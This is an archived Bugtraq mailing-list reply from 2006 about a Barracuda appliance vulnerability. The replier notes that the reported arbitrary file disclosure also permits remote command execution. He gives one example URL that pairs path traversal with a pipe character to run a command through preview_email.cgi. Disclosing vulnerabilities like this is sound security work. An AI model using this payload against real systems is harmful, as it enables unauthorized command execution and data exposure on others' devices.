Bugtraq mailing list archives
Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02]
From: Matthew Hall <lists () ecsc co uk>
Date: Thu, 03 Aug 2006 17:01:01 +0100
gssincla () nnlsoftware com wrote:
Title: Barracuda Arbitrary File Disclosure
This vulnerability doesn't just allow arbitrary file disclosure, but also allows remote execution of commands through use of the pipe characher (|), e.g: https://<deviceIP>/cgi-bin/preview_email.cgi?file=/mail/mlog/../../bin/ls%20/| Regards, Matt
Current thread:
- Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02] gssincla (Aug 01)
- Re: Barracuda Vulnerability: Arbitrary File Disclosure [NNL-20060801-02] Matthew Hall (Aug 03)